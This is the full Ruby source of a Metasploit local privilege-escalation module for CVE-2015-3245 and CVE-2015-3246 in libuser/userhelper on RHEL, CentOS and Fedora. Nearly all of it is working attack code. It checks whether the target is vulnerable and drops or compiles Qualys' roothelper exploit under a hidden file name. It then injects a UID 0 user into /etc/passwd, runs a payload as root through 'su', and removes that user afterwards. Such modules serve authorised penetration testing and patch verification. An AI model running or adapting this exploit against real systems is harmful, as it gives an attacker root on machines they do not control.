Libuser roothelper Privilege Escalation

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = GreatRanking  
  
include Msf::Post::File  
include Msf::Post::Linux::Priv  
include Msf::Post::Linux::System  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Libuser roothelper Privilege Escalation',  
'Description' => %q{  
This module attempts to gain root privileges on Red Hat based Linux  
systems, including RHEL, Fedora and CentOS, by exploiting a newline  
injection vulnerability in libuser and userhelper versions prior to  
0.56.13-8 and version 0.60 before 0.60-7.  
  
This module makes use of the roothelper.c exploit from Qualys to  
insert a new user with UID=0 in /etc/passwd.  
  
Note, the password for the current user is required by userhelper.  
  
Note, on some systems, such as Fedora 11, the user entry for the  
current user in /etc/passwd will become corrupted and exploitation  
will fail.  
  
This module has been tested successfully on libuser packaged versions  
0.56.13-4.el6 on CentOS 6.0 (x86_64);  
0.56.13-5.el6 on CentOS 6.5 (x86_64);  
0.60-5.el7 on CentOS 7.1-1503 (x86_64);  
0.56.16-1.fc13 on Fedora 13 (i686);  
0.59-1.fc19 on Fedora Desktop 19 (x86_64);  
0.60-3.fc20 on Fedora Desktop 20 (x86_64);  
0.60-6.fc21 on Fedora Desktop 21 (x86_64);  
0.60-6.fc22 on Fedora Desktop 22 (x86_64);  
0.56.13-5.el6 on Red Hat 6.6 (x86_64); and  
0.60-5.el7 on Red Hat 7.0 (x86_64).  
  
RHEL 5 is vulnerable, however the installed version of glibc (2.5)  
is missing various functions required by roothelper.c.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Qualys', # Discovery and C exploit  
'Brendan Coles' # Metasploit  
],  
'DisclosureDate' => 'Jul 24 2015',  
'Platform' => [ 'linux' ],  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'SessionTypes' => [ 'shell', 'meterpreter' ],  
'Targets' => [[ 'Auto', {} ]],  
'Privileged' => true,  
'References' =>  
[  
[ 'AKA', 'roothelper.c' ],  
[ 'EDB', '37706' ],  
[ 'CVE', '2015-3245' ],  
[ 'CVE', '2015-3246' ],  
[ 'BID', '76021' ],  
[ 'BID', '76022' ],  
[ 'URL', 'http://seclists.org/oss-sec/2015/q3/185' ],  
[ 'URL', 'https://access.redhat.com/articles/1537873' ]  
],  
'DefaultTarget' => 0))  
register_options [  
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),  
OptString.new('PASSWORD', [ true, 'Password for the current user', '' ]),  
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])  
]  
end  
  
def base_dir  
datastore['WritableDir'].to_s  
end  
  
def password  
datastore['PASSWORD'].to_s  
end  
  
def upload(path, data)  
print_status "Writing '#{path}' (#{data.size} bytes) ..."  
rm_f path  
write_file path, data  
register_file_for_cleanup path  
end  
  
def upload_and_chmodx(path, data)  
upload path, data  
cmd_exec "chmod +x '#{path}'"  
end  
  
def live_compile?  
compile = false  
  
if datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')  
if has_gcc?  
vprint_good 'gcc is installed'  
compile = true  
else  
unless datastore['COMPILE'].eql? 'Auto'  
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'  
end  
end  
end  
  
compile  
end  
  
def check  
userhelper_path = '/usr/sbin/userhelper'  
unless setuid? userhelper_path  
vprint_error "#{userhelper_path} is not setuid"  
return CheckCode::Safe  
end  
vprint_good "#{userhelper_path} is setuid"  
  
unless command_exists? 'script'  
vprint_error "script is not installed. Exploitation will fail."  
return CheckCode::Safe  
end  
vprint_good 'script is installed'  
  
if cmd_exec('lsattr /etc/passwd').include? 'i'  
vprint_error 'File /etc/passwd is immutable'  
return CheckCode::Safe  
end  
vprint_good 'File /etc/passwd is not immutable'  
  
glibc_banner = cmd_exec 'ldd --version'  
glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first  
if glibc_version.to_s.eql? ''  
vprint_error 'Could not determine the GNU C library version'  
return CheckCode::Detected  
end  
  
# roothelper.c requires functions only available since glibc 2.6+  
if glibc_version < Gem::Version.new('2.6')  
vprint_error "GNU C Library version #{glibc_version} is not supported"  
return CheckCode::Safe  
end  
vprint_good "GNU C Library version #{glibc_version} is supported"  
  
CheckCode::Detected  
end  
  
def exploit  
if check == CheckCode::Safe  
fail_with Failure::NotVulnerable, 'Target is not vulnerable'  
end  
  
if is_root?  
fail_with Failure::BadConfig, 'Session already has root privileges'  
end  
  
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'  
fail_with Failure::BadConfig, "#{base_dir} is not writable"  
end  
  
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"  
executable_path = "#{base_dir}/#{executable_name}"  
  
if live_compile?  
vprint_status 'Live compiling exploit on system...'  
  
# Upload Qualys' roothelper.c exploit:  
# - https://www.exploit-db.com/exploits/37706/  
path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c'  
fd = ::File.open path, 'rb'  
c_code = fd.read fd.stat.size  
fd.close  
upload "#{executable_path}.c", c_code  
output = cmd_exec "gcc -o #{executable_path} #{executable_path}.c"  
  
unless output.blank?  
print_error output  
fail_with Failure::Unknown, "#{executable_path}.c failed to compile"  
end  
  
cmd_exec "chmod +x #{executable_path}"  
register_file_for_cleanup executable_path  
else  
vprint_status 'Dropping pre-compiled exploit on system...'  
  
# Cross-compiled with:  
# - i486-linux-musl-gcc -o roothelper -static -pie roothelper.c  
path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper'  
fd = ::File.open path, 'rb'  
executable_data = fd.read fd.stat.size  
fd.close  
upload_and_chmodx executable_path, executable_data  
end  
  
# Run roothelper  
timeout = 180  
print_status "Launching roothelper exploit (Timeout: #{timeout})..."  
output = cmd_exec "echo #{password.gsub(/'/, "\\\\'")} | #{executable_path}", nil, timeout  
output.each_line { |line| vprint_status line.chomp }  
  
if output =~ %r{Creating a backup copy of "/etc/passwd" named "(.*)"}  
register_file_for_cleanup $1  
end  
  
if output =~ /died in parent: .*.c:517: forkstop_userhelper/  
fail_with Failure::NoAccess, 'Incorrect password'  
end  
  
@username = nil  
  
if output =~ /Exploit successful, run "su ([a-z])" to become root/  
@username = $1  
end  
  
if @username.blank?  
fail_with Failure::Unknown, 'Something went wrong'  
end  
  
print_good "Success! User '#{@username}' added to /etc/passwd"  
  
# Upload payload executable  
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"  
upload_and_chmodx payload_path, generate_payload_exe  
  
# Execute payload executable  
vprint_status 'Executing payload...'  
cmd_exec "script -c \"su - #{@username} -c #{payload_path}\" | sh & echo "  
register_file_for_cleanup 'typescript'  
end  
  
#  
# Remove new user from /etc/passwd  
#  
def on_new_session(session)  
new_user_removed = false  
  
if session.type.to_s.eql? 'meterpreter'  
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'  
  
# Remove new user  
session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' /etc/passwd\""  
  
# Wait for clean up  
Rex.sleep 5  
  
# Check for new user in /etc/passwd  
passwd_contents = session.fs.file.open('/etc/passwd').read.to_s  
unless passwd_contents =~ /^#{@username}:/  
new_user_removed = true  
end  
elsif session.type.to_s.eql? 'shell'  
# Remove new user  
session.shell_command_token "sed -i 's/^#{@username}:.*$//g' /etc/passwd"  
  
# Check for new user in /etc/passwd  
passwd_user = session.shell_command_token "grep '#{@username}:' /etc/passwd"  
unless passwd_user =~ /^#{@username}:/  
new_user_removed = true  
end  
end  
  
unless new_user_removed  
print_warning "Could not remove user '#{@username}' from /etc/passwd"  
end  
rescue => e  
print_error "Error during cleanup: #{e.message}"  
ensure  
super  
end  
end  
`